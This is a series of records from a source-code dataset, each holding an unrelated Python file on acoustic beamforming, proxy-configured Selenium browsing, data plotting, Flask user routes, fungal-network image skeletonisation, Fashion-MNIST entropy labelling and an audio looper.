max(np.finfo(input_type).max, abs(np.finfo(input_type).min))\n\n room_sig = pra.ShoeBox(room_dim, absorption=absorption_fact, fs=fs_s, \n max_order=max_order)\n room_sig.add_source(pos_source, signal=speech)\n room_sig.add_microphone_array(pra.Beamformer(R, fs_s, N=fft_len))\n room_sig.simulate()\n room_sig.mic_array.rake_delay_and_sum_weights(room_sig.sources[0][:1])\n speech_bf = room_sig.mic_array.process()\n\n room_sig.plot(freq=[500, 1000, 2000, 4000], img_order=0)\n plt.title(\"Room (signal)\")\n plt.legend(['500', '1000', '2000', '4000'])\n plt.grid()\n\n \"\"\"\n Now the room with just the noise. MUST BE SAME BEAMFORMER\n \"\"\"\n fs_n, noise = wavfile.read(noise_file_location)\n if fs_s != fs_n:\n raise ValueError(\"Sampling frequencies not equal!\")\n room_noise = pra.ShoeBox(room_dim, absorption=absorption_fact, fs=fs_n, \n max_order=max_order)\n room_noise.add_source(pos_noise, signal=noise)\n room_noise.add_microphone_array(pra.Beamformer(R, fs_n, N=fft_len))\n room_noise.simulate()\n room_noise.mic_array.rake_delay_and_sum_weights(room_sig.sources[0][:1])\n noise_bf = room_noise.mic_array.process()\n\n room_noise.plot(freq=[500, 1000, 2000, 4000], img_order=0)\n plt.title(\"Room (noise)\")\n plt.legend(['500', '1000', '2000', '4000'])\n plt.grid()\n\n \"\"\"\n We wish to compute the SNR wrt to same (single) microphone. Let's use the\n center microphone.\n \"\"\"\n ref_mic_sig = room_sig.mic_array.signals[-1,:]\n ref_mic_noise = room_noise.mic_array.signals[-1,:]\n\n # truncate noise to same length\n ref_mic_noise = ref_mic_noise[:len(ref_mic_sig)]\n\n # norm factor for signal and noise\n sig_lvl = np.linalg.norm(ref_mic_sig)\n noise_norm_fact = np.linalg.norm(ref_mic_noise)\n snr_facts = sig_lvl * 10**(-snr_vals/20) / noise_norm_fact # multiple noise by this\n\n # make sure factors computed correctly\n print()\n print(\"CHECKING THAT SNR FACTORS ARE COMPUTED CORRECTLY\")\n for idx, fact in enumerate(snr_facts):\n signal_lvl = np.linalg.norm(ref_mic_sig)\n noise_lvl = np.linalg.norm(ref_mic_noise * fact)\n print(\"Expected SNR : %f\" % snr_vals[idx])\n snr_db = 20*np.log10(signal_lvl/noise_lvl)\n print(\"SNR : %f\" % snr_db)\n\n \"\"\"\n Weight and add beamformed output from signal and noise to simulate beamforming\n under different SNRs.\n \"\"\"\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n\n # truncate beamformed noise\n noise_bf = noise_bf[:len(speech_bf)]\n\n # compute score for different SNR vals\n print()\n score_beamformed = np.empty(len(snr_vals))\n score_single = np.empty(len(snr_vals))\n for idx, snr in enumerate(snr_vals):\n\n noisy_signal = speech_bf + snr_facts[idx]*noise_bf\n noisy_signal = pra.normalize(pra.highpass(noisy_signal, fs_s), bits=16).astype(np.int16)\n dest = os.path.join(dest_dir,\"das_bf_snr_db_%d.wav\" %(snr))\n wavfile.write(dest, fs_s, noisy_signal)\n score_beamformed[idx] = label_wav(dest, labels_file, graph_file, \n speech_samp.meta.word)\n\n # compute score for single mic for reference\n single_mic = ref_mic_sig + snr_facts[idx]*ref_mic_noise\n single_mic = pra.normalize(pra.highpass(single_mic, fs_s), bits=16).astype(np.int16)\n dest = os.path.join(dest_dir,\"single_mic_snr_db_%d.wav\" %(snr))\n wavfile.write(dest, fs_s, single_mic)\n score_single[idx] = label_wav(dest, labels_file, graph_file, \n speech_samp.meta.word)\n\n\n plt.figure()\n plt.plot(snr_vals,score_beamformed, label=\"beamformed signal\")\n plt.plot(snr_vals,score_single, label=\"single mic (center)\")\n plt.legend()\n plt.grid()\n plt.ylabel(\"Score\")\n plt.xlabel(\"SNR [dB]\")\n plt.title('Classification for : ' + speech_samp.meta.word)\n\n plt.show()\n \n\n\n","sub_path":"examples/snr_vs_classification_das_bf.py","file_name":"snr_vs_classification_das_bf.py","file_ext":"py","file_size_in_byte":7941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"243614425","text":"# encoding='utf-8'\n\nfrom selenium import webdriver as web\n\nchromePath = r'd:/chromedriver.exe'\naccessPath = 'http://httpbin.org/ip'\nproxyBaseStr = '--proxy-server='\nproxyIP = '113.65.5.225'\nproxyPORT = 8118\nproxyStr = proxyBaseStr+proxyIP+':'+str(proxyPORT)\nprint(proxyStr)\noptions = web.ChromeOptions()\noptions.add_argument(proxyStr)\n\ndriver = web.Chrome(executable_path=chromePath, chrome_options=options)\ndriver.get(accessPath)\nprint(driver.current_url)\n\n","sub_path":"before/python3/练习1/proxy11.py","file_name":"proxy11.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"640681030","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\nmpl.rc(\"font\",family='Arial')\nfn={'fontname':'Arial'}\nfs_lab=15\nfs_tit=19\nfs_leg=12\n\np0b=np.arange(28,200,1)\np0s=0.00600535*p0b-0.28950578\ndc=0.08# np.arange(0.01,0.2,0.001)\nw=dc*p0b\ndw=1.#np.arange(0.1,15,0.1)\nsnm=10 # np.arange(10,100)\nyoffsum=1.\nsig=1. \ndsig=(snm/sig)*np.sqrt((p0s/120.)*yoffsum**2 + (dw/((2*sig)*(p0b-w)))**2)\ndwer=snm*dw/w\ndpi=(np.sqrt(p0s/120.))*p0b/np.sqrt(w)\ndpo=p0b/(np.sqrt(w*(p0b-w)))\ndsnm=np.sqrt(dpo**2+dsig**2+dwer**2+dpi**2)\nplt.figure(figsize=(6.5,4.5))\nxplt=p0b\nplt.plot(xplt,(np.zeros(len(xplt))+dpi)/snm,label=r'$dp_{i}$',ls='--')\nplt.plot(xplt,(np.zeros(len(xplt))+dpo)/snm,label=r'$dp_{off}$',ls='--')\nplt.plot(xplt,(np.zeros(len(xplt))+dsig)/snm,label=r'$d\\sigma_{off}$',ls='--')\nplt.plot(xplt,(np.zeros(len(xplt))+dwer)/snm,label=r'$dW$',ls='--')\nplt.plot(xplt,dsnm/snm,label=r'$dS/N$')\nplt.legend(fontsize=fs_leg,loc='upper left')\nplt.suptitle('Normalized error vs. Spin Period',fontsize=fs_tit)\nplt.xlabel('Spin Period [bins]',fontsize=fs_lab)\nplt.ylabel('dS/N / S/N',fontsize=fs_lab)\nplt.show()\n","sub_path":"error_plotter.py","file_name":"error_plotter.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"476784278","text":"import os\nimport csv\nimport wget\nimport numpy as np\n\nannotation_file_name = 'annotations.csv'\nurl = \"https://anomaly-recordings.s3.us-west-2.amazonaws.com\"\n\nos.makedirs('videos', exist_ok=True)\n\nwith open(annotation_file_name, mode='r', encoding='utf-8-sig') as csv_read_file:\n csv_reader = csv.DictReader(csv_read_file)\n\n for line in csv_reader:\n if line['video'] not in (None, \"\", '[]') and not os.path.exists('videos/' + line['video']):\n try:\n wget.download(url + '/' + line['video'], 'videos')\n except:\n print('Video file not found for row in annotation file' + line['video'])\n exit()","sub_path":"preprocessing/download_videos.py","file_name":"download_videos.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"48609775","text":"from flask import Blueprint, jsonify\nfrom webargs.flaskparser import use_kwargs\n\nfrom core.db import save_item\nfrom core.db.users import get_user_by_id\nfrom core.db.users.model import UserModel\n\nfrom services.users.resource import user_registration_schema, user_display_schema\n\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nblueprint = Blueprint('users', __name__)\n\n\n@blueprint.route('/users/signup', methods=[\"POST\"])\n@use_kwargs(user_registration_schema, locations=('json',))\ndef create_new_user(**kwargs):\n user = UserModel(id=kwargs.get('user_sub'),\n email=kwargs.get('email'),\n first_name=kwargs.get('first_name'),\n last_name=kwargs.get('last_name'))\n save_item(user)\n\n response = jsonify(user_display_schema.dump(user))\n response.status_code = 201\n\n return response\n\n\n@blueprint.route('/users/', methods=[\"GET\"])\ndef get_user(user_id):\n user = get_user_by_id(user_id)\n response = user_display_schema.dump(user)\n\n return jsonify(response)\n\n\n# @blueprint.route('/users//join/', methods=[\"POST\"])\n# @use_kwargs(user_join_org_schema, locations=('json',))\n# def join_org(user_id, org_id):\n# # Check user existence\n# user = get_user_by_id(user_id)\n#\n# # Check organization existence\n# org = get_organization_from_db(org_id)\n#\n# # Update the user's organization ID\n# actions = [UserModel.organization_id.set(org.id)]\n# update_item(user, actions)\n#\n# response = jsonify(user_display_schema.dump(user))\n# response.status_code = 201\n#\n# return response\n","sub_path":"services/users/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"140563333","text":"from codec.interfaces import ICommunication_Ctrl\nfrom codec.essential import Block_Weight\nfrom codec.interfaces import netEncapsulation\n\nfrom profiles.settings import GlobalSettings\n\n\nclass myComCtrl(ICommunication_Ctrl):\n def __init__(self, node_id):\n super().__init__()\n # 保存并记录本节点编号信息,除此之外再也没有其他地方可以获取该信息\n self.__node_id = node_id\n self.__global_weights = 0\n self.__current_recv = 0\n\n def dispose(self):\n print('my communication controller is disposed.')\n\n def update_blocks(self, block_weight: Block_Weight):\n print('Weights delta received.')\n print('from block: {}'.format(block_weight.Block_ID))\n print('It has a content with shape: {}'.format(block_weight.Content.shape))\n\n # 获取没有该数据的节点\n send_to = block_weight.Adversary_ID\n # 我们使用 'data' 字符串来标记我们的梯度内容\n pkg = {\n 'data': block_weight.Content\n }\n # 记录本机梯度\n self.__global_weights += block_weight.Content\n self.__current_recv += 1\n # 检查是否接受完所有数据\n self.__do_grad_average()\n # 发送梯度\n yield netEncapsulation(send_to, pkg)\n\n def receive_blocks(self, content: dict):\n print('I have received an package.')\n print('It has a content with shape: {}'.format(content['data'].shape))\n # 记录梯度内容\n self.__global_weights += content['data']\n # 记录已经接收到多少个梯度了\n self.__current_recv += 1\n # 检查是否接受完所有数据\n self.__do_grad_average()\n\n def __do_grad_average(self):\n how_much_nodes = GlobalSettings.get_default().node_count\n if self.__current_recv == how_much_nodes:\n # 执行梯度平均\n self.set_result(self.__global_weights / how_much_nodes)\n # 重设梯度值,等待下一批次的循环\n self.__global_weights = 0\n self.__current_recv = 0","sub_path":"codec/tutorial_codec.py","file_name":"tutorial_codec.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"514005125","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport aiohttp\nimport asyncio\nfrom bs4 import BeautifulSoup\n\n@asyncio.coroutine\ndef get(*args, **kw):\n session = aiohttp.ClientSession()\n resp = yield from session.get(*args, **kw)\n return (yield from resp.text())\n\ndef post_url(webpage):\n soup = BeautifulSoup(webpage)\n post_id = [a.attrs.get('data-threads-id') for a in soup.select('[class~=h-threads-item]')]\n print(post_id)\n for id in post_id:\n return 'http://kukuku.cc/t/' + str(id)\n\n@asyncio.coroutine\ndef save_image(url):\n webpage = yield from get(url)\n print(post_url(webpage))\n\nif '__main__' == __name__:\n urls = {'http://kukuku.cc/综合版1/page={}'.format(i) for i in range(1,10)}\n loop = asyncio.get_event_loop()\n loop.run_until_complete(asyncio.wait([save_image(url) for url in urls]))\n","sub_path":"kkk_aiohttp.py","file_name":"kkk_aiohttp.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"542997408","text":"import sys\r\nfrom amftrack.util.sys import get_dirname, pastis_path, fiji_path, path_code, temp_path\r\nimport pandas as pd\r\nimport shutil\r\nfrom scipy import sparse\r\nfrom datetime import datetime\r\nfrom amftrack.pipeline.functions.image_processing.experiment_class_surf import orient\r\nimport scipy.io as sio\r\nimport cv2 as cv\r\nimport imageio.v2 as imageio\r\nimport numpy as np\r\nfrom skimage.filters import frangi\r\nfrom skimage import filters\r\nimport scipy.sparse\r\nimport os\r\nfrom time import time\r\nfrom skimage.feature import hessian_matrix_det\r\nfrom amftrack.pipeline.functions.image_processing.extract_graph import (\r\n from_sparse_to_graph,\r\n generate_nx_graph,\r\n)\r\nfrom bresenham import bresenham\r\nfrom time import time_ns\r\nimport subprocess\r\nimport cv2\r\n\r\n\r\ndef streline(linelen, degrees):\r\n theta = degrees % 180 * np.pi / 180\r\n ray = (linelen - 1) / 2\r\n x = int(np.round((linelen - 1) / 2 * np.cos(theta)))\r\n y = -int(np.round((linelen - 1) / 2 * np.sin(theta)))\r\n points = np.array(list(bresenham(0, 0, x, y)))\r\n c, r = np.concatenate((-np.flip(points[:, 0]), [0], points[:, 0])), np.concatenate(\r\n (-np.flip(points[:, 1]), [0], points[:, 1])\r\n )\r\n M = 2 * np.max(np.abs(r)) + 1\r\n N = 2 * np.max(np.abs(c)) + 1\r\n line = np.zeros((M, N))\r\n x0 = np.expand_dims((r + np.max(np.abs(r))), 1)\r\n y0 = np.expand_dims((c + np.max(np.abs(c))), 1)\r\n line[x0, y0] = 1\r\n return line\r\n\r\n\r\ndef stredisk(radius):\r\n return cv.getStructuringElement(cv.MORPH_ELLIPSE, (2 * radius - 1, 2 * radius - 1))\r\n\r\n\r\ndef remove_component(dilated, min_size=4000):\r\n nb_components, output, stats, centroids = cv.connectedComponentsWithStats(\r\n dilated.astype(np.uint8), connectivity=8\r\n )\r\n # connectedComponentswithStats yields every seperated component with information on each of them, such as size\r\n # the following part is just taking out the background which is also considered a component, but most of the time we don't want that.\r\n sizes = stats[1:, -1]\r\n nb_components = nb_components - 1\r\n\r\n # minimum size of particles we want to keep (number of pixels)\r\n # here, it's a fixed value, but you can set it as you want, eg the mean of the sizes or whatever\r\n\r\n # your answer image\r\n img_f = np.zeros((dilated.shape))\r\n # for every component in the image, you keep it only if it's above min_size\r\n for i in range(0, nb_components):\r\n if sizes[i] >= min_size:\r\n img_f[output == i + 1] = 1\r\n return np.array(255 * img_f, dtype=np.uint8)\r\n\r\n\r\ndef bowler_hat(im, no, si):\r\n o = np.linspace(0, 180, no)\r\n imol = np.zeros((im.shape[0], im.shape[1], len(si), no))\r\n imod = np.zeros((im.shape[0], im.shape[1], len(si)))\r\n for i in range(0, len(si)):\r\n for j in range(0, no):\r\n se = streline(si[i], o[j]).astype(np.uint8)\r\n imol[:, :, i, j] = cv.morphologyEx(im, cv.MORPH_OPEN, se)\r\n se = stredisk(int(np.round(si[i] / 2))).astype(np.uint8)\r\n imod[:, :, i] = cv.morphologyEx(im, cv.MORPH_OPEN, se)\r\n imd = np.zeros((im.shape[0], im.shape[1], len(si)))\r\n imr = np.zeros((im.shape[0], im.shape[1], len(si)))\r\n imm = np.zeros((im.shape[0], im.shape[1], len(si)))\r\n triv = imod == 0\r\n for i in range(len(si)):\r\n imm[:, :, i] = np.max(np.squeeze(imol[:, :, i, :]), axis=2)\r\n imd[:, :, i] = imm[:, :, i] - imod[:, :, i]\r\n imr[triv] = 0\r\n imda = np.max(imd, axis=2)\r\n imda = np.double(imda)\r\n imda = (imda - np.min(imda[:])) / (np.max(imda[:]) - np.min(imda[:]))\r\n return imda\r\n\r\n\r\ndef extract_skel_new_prince(im, params, perc_low, perc_high):\r\n bowled = bowler_hat(-im.astype(np.uint8), 32, params)\r\n filename = time_ns()\r\n place_save = temp_path\r\n to_smooth = np.minimum(bowled * 255, 255 - im)\r\n # to_smooth = 255-im\r\n imtransformed_path = f\"{place_save}/{filename}.tif\"\r\n imageio.imsave(imtransformed_path, to_smooth.astype(np.uint8))\r\n path_anis = pastis_path\r\n args = [0.1, 7, 0.9, 10, 50]\r\n command = [path_anis, imtransformed_path] + args\r\n command = [str(elem) for elem in command]\r\n print(\"anis filtering\")\r\n process = subprocess.run(command, cwd=place_save, stdout=subprocess.DEVNULL)\r\n foldname = (\r\n f\"{filename}_ani-K{int(args[0]*10)}s{args[1]}g{int(args[2]*10)}itD{args[3]}\"\r\n )\r\n imname = foldname + f\"/{foldname}it{args[4]}.tif\"\r\n path_modif = place_save + \"/\" + imname\r\n try:\r\n im2 = imageio.imread(path_modif)\r\n except:\r\n im2 = to_smooth.astype(np.uint8)\r\n print(\"image_reading\")\r\n shutil.rmtree(os.path.join(place_save, foldname))\r\n low = max(20, np.percentile(im2, perc_low))\r\n high = max(90, np.percentile(im2, perc_high))\r\n transformed = im2\r\n hyst = filters.apply_hysteresis_threshold(transformed, low, high)\r\n dilated = remove_holes(hyst)\r\n dilated = dilated.astype(np.uint8)\r\n connected = remove_component(dilated)\r\n # os.remove(imtransformed_path)\r\n return connected\r\n\r\n\r\ndef extend_tip(skeletonized, dilated, dist):\r\n img2 = np.zeros((dilated.shape))\r\n nx_g = generate_nx_graph(\r\n from_sparse_to_graph(scipy.sparse.dok_matrix(skeletonized))\r\n )\r\n g, pos = nx_g\r\n tips = [node for node in g.nodes if g.degree(node) == 1]\r\n dilated_bis = np.copy(img2)\r\n for tip in tips:\r\n branch = np.array(\r\n orient(g.get_edge_data(*list(g.edges(tip))[0])[\"pixel_list\"], pos[tip])\r\n )\r\n orientation = branch[0] - branch[min(branch.shape[0] - 1, 20)]\r\n orientation = orientation / (np.linalg.norm(orientation))\r\n window = 20\r\n x, y = pos[tip][0], pos[tip][1]\r\n if (\r\n x - window >= 0\r\n and x + window < dilated.shape[0]\r\n and y - window >= 0\r\n and y + window < dilated.shape[1]\r\n ):\r\n shape_tip = dilated[x - window : x + window, y - window : y + window]\r\n # dist = 20\r\n for i in range(dist):\r\n pixel = (pos[tip] + orientation * i).astype(int)\r\n xp, yp = pixel[0], pixel[1]\r\n if (\r\n xp - window >= 0\r\n and xp + window < dilated.shape[0]\r\n and yp - window >= 0\r\n and yp + window < dilated.shape[1]\r\n ):\r\n dilated_bis[\r\n xp - window : xp + window, yp - window : yp + window\r\n ] += shape_tip\r\n kernel = np.ones((3, 3), np.uint8)\r\n dilation = cv.dilate(dilated_bis.astype(np.uint8) * 255, kernel, iterations=1)\r\n for i in range(3):\r\n dilation = cv.erode(dilation.astype(np.uint8) * 255, kernel, iterations=1)\r\n dilation = cv.dilate(dilation.astype(np.uint8) * 255, kernel, iterations=1)\r\n dilation = cv.erode(\r\n dilation.astype(np.uint8) * 255, kernel, iterations=2\r\n ) # recent addition for agg, careful\r\n return dilation > 0\r\n\r\n\r\ndef remove_holes(hyst):\r\n kernel = np.ones((3, 3), np.uint8)\r\n dilation = cv.dilate(hyst.astype(np.uint8) * 255, kernel, iterations=1)\r\n for i in range(3):\r\n dilation = cv.erode(dilation.astype(np.uint8) * 255, kernel, iterations=1)\r\n dilation = cv.dilate(dilation.astype(np.uint8) * 255, kernel, iterations=1)\r\n return dilation > 0\r\n\r\n\r\ndef extract_skel_tip_ext(im, low, high, dist):\r\n im_cropped = im\r\n # im_blurred =cv2.GaussianBlur(im_cropped, (201, 201),50)\r\n im_blurred = cv2.blur(im_cropped, (200, 200))\r\n im_back_rem = (\r\n (im_cropped)\r\n / ((im_blurred == 0) * np.ones(im_blurred.shape) + im_blurred)\r\n * 120\r\n )\r\n im_back_rem[im_back_rem >= 130] = 130\r\n # im_back_rem = im_cropped*1.0\r\n # # im_back_rem = cv2.normalize(im_back_rem, None, 0, 255, cv2.NORM_MINMAX)\r\n frangised = frangi(im_back_rem, sigmas=range(1, 20, 4)) * 255\r\n # # frangised = cv2.normalize(frangised, None, 0, 255, cv2.NORM_MINMAX)\r\n hessian = hessian_matrix_det(im_back_rem, sigma=20)\r\n blur_hessian = cv2.blur(abs(hessian), (20, 20))\r\n # transformed = (frangised+cv2.normalize(blur_hessian, None, 0, 255, cv2.NORM_MINMAX)-im_back_rem+120)*(im_blurred>=35)\r\n # transformed = (frangised+cv2.normalize(abs(hessian), None, 0, 255, cv2.NORM_MINMAX)-im_back_rem+120)*(im_blurred>=35)\r\n transformed = (frangised - im_back_rem + 120) * (im_blurred >= 35)\r\n\r\n lowt = (transformed > low).astype(int)\r\n hight = (transformed > high).astype(int)\r\n hyst = filters.apply_hysteresis_threshold(transformed, low, high)\r\n kernel = np.ones((3, 3), np.uint8)\r\n dilation = cv2.dilate(hyst.astype(np.uint8) * 255, kernel, iterations=1)\r\n for i in range(3):\r\n dilation = cv2.erode(dilation.astype(np.uint8) * 255, kernel, iterations=1)\r\n dilation = cv2.dilate(dilation.astype(np.uint8) * 255, kernel, iterations=1)\r\n dilated = dilation > 0\r\n\r\n nb_components, output, stats, centroids = cv2.connectedComponentsWithStats(\r\n dilated.astype(np.uint8), connectivity=8\r\n )\r\n # connectedComponentswithStats yields every seperated component with information on each of them, such as size\r\n # the following part is just taking out the background which is also considered a component, but most of the time we don't want that.\r\n sizes = stats[1:, -1]\r\n nb_components = nb_components - 1\r\n\r\n # minimum size of particles we want to keep (number of pixels)\r\n # here, it's a fixed value, but you can set it as you want, eg the mean of the sizes or whatever\r\n min_size = 4000\r\n\r\n # your answer image\r\n img2 = np.zeros((dilated.shape))\r\n # for every component in the image, you keep it only if it's above min_size\r\n for i in range(0, nb_components):\r\n if sizes[i] >= min_size:\r\n img2[output == i + 1] = 1\r\n skeletonized = cv2.ximgproc.thinning(np.array(255 * img2, dtype=np.uint8))\r\n nx_g = generate_nx_graph(\r\n from_sparse_to_graph(scipy.sparse.dok_matrix(skeletonized))\r\n )\r\n g, pos = nx_g\r\n tips = [node for node in g.nodes if g.degree(node) == 1]\r\n dilated_bis = np.copy(img2)\r\n for tip in tips:\r\n branch = np.array(\r\n orient(g.get_edge_data(*list(g.edges(tip))[0])[\"pixel_list\"], pos[tip])\r\n )\r\n orientation = branch[0] - branch[min(branch.shape[0] - 1, 20)]\r\n orientation = orientation / (np.linalg.norm(orientation))\r\n window = 20\r\n x, y = pos[tip][0], pos[tip][1]\r\n if (\r\n x - window >= 0\r\n and x + window < dilated.shape[0]\r\n and y - window >= 0\r\n and y + window < dilated.shape[1]\r\n ):\r\n shape_tip = dilated[x - window : x + window, y - window : y + window]\r\n # dist = 20\r\n for i in range(dist):\r\n pixel = (pos[tip] + orientation * i).astype(int)\r\n xp, yp = pixel[0], pixel[1]\r\n if (\r\n xp - window >= 0\r\n and xp + window < dilated.shape[0]\r\n and yp - window >= 0\r\n and yp + window < dilated.shape[1]\r\n ):\r\n dilated_bis[\r\n xp - window : xp + window, yp - window : yp + window\r\n ] += shape_tip\r\n dilation = cv2.dilate(dilated_bis.astype(np.uint8) * 255, kernel, iterations=1)\r\n for i in range(3):\r\n dilation = cv2.erode(dilation.astype(np.uint8) * 255, kernel, iterations=1)\r\n dilation = cv2.dilate(dilation.astype(np.uint8) * 255, kernel, iterations=1)\r\n dilation = cv2.erode(\r\n dilation.astype(np.uint8) * 255, kernel, iterations=2\r\n ) # recent addition for agg, careful\r\n return dilation\r\n\r\n\r\ndef make_back_sub(directory, dirname, op_id):\r\n a_file = open(\r\n f\"{path_code}pipeline/scripts/stitching_loops/background_substract.ijm\", \"r\"\r\n )\r\n\r\n list_of_lines = a_file.readlines()\r\n\r\n list_of_lines[4] = f\"mainDirectory = \\u0022{directory}\\u0022 ;\\n\"\r\n list_of_lines[29] = f\"\\t if(startsWith(list[i],\\u0022{dirname}\\u0022)) \\u007b\\n\"\r\n file_name = f\"{temp_path}/stitching_loops/background_substract{op_id}.ijm\"\r\n a_file = open(file_name, \"w\")\r\n\r\n a_file.writelines(list_of_lines)\r\n\r\n a_file.close()\r\n\r\n\r\ndef run_back_sub(directory, folder):\r\n op_id = time_ns()\r\n make_back_sub(directory, folder, op_id)\r\n command = [\r\n fiji_path,\r\n \"--mem=8000m\",\r\n \"--headless\",\r\n \"--ij2\",\r\n \"--console\",\r\n \"-macro\",\r\n f'{os.getenv(\"TEMP\")}/stitching_loops/background_substract{op_id}.ijm',\r\n ]\r\n subprocess.run(command, stdout=subprocess.DEVNULL)\r\n","sub_path":"amftrack/pipeline/functions/image_processing/extract_skel.py","file_name":"extract_skel.py","file_ext":"py","file_size_in_byte":12655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"282191077","text":"import matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom math import isnan\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.linear_model import LogisticRegression as LR\nfrom keras.datasets import fashion_mnist\nimport itertools\nimport codecs\n\n# import warnings filter\nfrom warnings import simplefilter\n# ignore all future warnings\nsimplefilter(action = 'ignore', category = FutureWarning)\n\ndef factorial(n):\n if n == 0:\n return 1\n elif n > 0:\n return n*factorial(n - 1)\n else:\n print(\"sth wrong\")\n \n# entropy labelling\ndef shannon_label(probas, s_cls):\n info_con = (-1)*np.log2(probas)\n # entropy\n Hp = np.sum(np.multiply(probas, info_con))\n if isnan(Hp):\n labels = [s_cls[np.argmax(probas)]]\n else:\n labels = [s_cls[i] for i, Ipk in enumerate(info_con) if Ipk <= Hp]\n return labels\n\n# labelling and evaluating them\ndef shannon_scls_eval(classes, orig_A, lim_A):\n s_cls = classes\n\n # extract dataset of chosen classes\n trn_imgs = [img for i, img in enumerate(train_imgs) if train_labels[i] in s_cls]\n trn_labels = [label for label in train_labels if label in s_cls]\n tst_imgs = [img for i, img in enumerate(test_imgs) if test_labels[i] in s_cls]\n tst_labels = [label for label in test_labels if label in s_cls]\n\n # generate an annotator\n a1_model = LR().fit(trn_imgs[:orig_A], trn_labels[:orig_A])\n a1_proba = a1_model.predict_proba(trn_imgs[orig_A:orig_A + lim_A])\n\n # entropy labelling\n mul_labels = [shannon_label(probas, s_cls) for probas in a1_proba]\n \n # dump generated labels and original true labels\n print(\"generated labels and original labels\", sep = \"\\n\", file = codecs.open(\"shannon_fmnist_log.txt\", 'a', 'utf-8'))\n print(mul_labels, sep = \"\\n\", file = codecs.open(\"shannon_fmnist_log.txt\", 'a', 'utf-8'))\n print(trn_labels[orig_A:orig_A + lim_A], sep = \"\\n\", file = codecs.open(\"shannon_fmnist_log.txt\", 'a', 'utf-8'))\n \n # labels score evaluation\n score = 0\n for labels, t_label in zip(mul_labels, trn_labels[orig_A:orig_A + lim_A]):\n for l in labels:\n if (l == t_label):\n score += 1\n\n m_labels = []\n for labels in mul_labels:\n [m_labels.append(l) for l in labels] \n \n return (len(m_labels)/lim_A, score*100/len(m_labels))\n\n# loading MNIST\n(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()\ntrain_imgs = np.array([x.ravel() for x in train_images])\ntest_imgs = np.array([y.ravel() for y in test_images])\n\nimg_SIZE = train_images.shape[1]*train_images.shape[2]\n\n# main experiment\nclasses = [i for i in range(10)]\norig_A1, lim_A1 = 2000, 2000\n\nfact_10 = factorial(10)\n\nevals = []\nfor i in range(10, 11): # i: num of sub-classes\n a, b = 0, 0\n if (i == 10):\n sample_lnum, sample_lqual = shannon_scls_eval(classes, orig_A1, lim_A1)\n evals.append((sample_lnum, sample_lqual))\n else:\n combi_ni = fact_10//(factorial(i)*factorial(10 - i))\n for scls in itertools.combinations(classes, i):\n sample_lnum, sample_lqual = shannon_scls_eval(list(scls), orig_A1, lim_A1)\n a += sample_lnum\n b += sample_lqual\n evals.append((a/combi_ni, b/combi_ni))\nprint(\"labels evaluation\", sep = '\\n', file = codecs.open(\"shannon_fmnist_log.txt\", 'a', 'utf-8'))\nprint(evals, sep = '\\n', file = codecs.open(\"shannon_fmnist_log.txt\", 'a', 'utf-8'))\n","sub_path":"final_experiments/Shannon_fashion-mnist.py","file_name":"Shannon_fashion-mnist.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"575297020","text":"from multiprocessing import Process\nimport pygame\nimport os\nimport shutil\nimport pygame.midi\nimport numpy as np\nimport time\nfrom area import Area\nimport looperAreas\nimport drawing as draw\nimport keyboard\nimport utils\nfrom utils import interpolate\nimport hotkeys\nimport sounddevice as sd\nimport customevents as events\nfrom wire import Wire\nfrom metronome import Metronome\nfrom track import Track\nfrom tonearm import Tonearm\nfrom loopDefault import LoopDefault\nfrom console import Console\nimport globalSettings as settings\nfrom listOfCommandsWide import ListOfCommandsWide\nfrom listOfDevicesWide import ListOfDevicesWide\nimport processor\nfrom soundbank import Soundbank\nfrom samplesController import SamplesController\nfrom samplesPanelWide import SamplesPanelWide\nfrom midiController import MidiController \nfrom midiPiano import MidiPiano\nfrom midiPads import MidiPads\nimport autoplayController as autoplay\nimport timeSynchronization as sync\n\n\"\"\" Main Loop \"\"\"\nstreamTimeStart = 0\nkeyboardMap = []\n_suspitiousFunctionKeysLag = 10\n\ndef selectArea(areaname):\n if not areaname in areas:\n return\n currentArea = areaname\n\nmarginTop = 1\n\n#TODO: возможность выбора устройств\nwire = Wire(inputDevice = 8, outputDevice = 8)\nif (sd.query_devices(wire.inputDevice)['name'] != 'Yamaha Steinberg USB ASIO'):\n raise Exception('NOPE! ' + sd.query_devices(wire.inputDevice)['name'])\nwireTempData = {\n 'audio': [],\n 'cursor': 0,\n 'midi-audio': []\n}\n\n\nmetronome = Metronome(120, left = 16, top = marginTop)\ntracks = [\n Track(0, LoopDefault, 1, marginTop),\n Track(1, LoopDefault, 2, marginTop),\n Track(2, LoopDefault, 3, marginTop),\n Track(3, LoopDefault, 4, marginTop),\n Track(4, LoopDefault, 6, marginTop),\n Track(5, LoopDefault, 7, marginTop),\n Track(6, LoopDefault, 8, marginTop),\n Track(7, LoopDefault, 9, marginTop),\n Track(8, LoopDefault, 11, marginTop),\n Track(9, LoopDefault, 12, marginTop),\n Track(10, LoopDefault, 13, marginTop),\n Track(11, LoopDefault, 14, 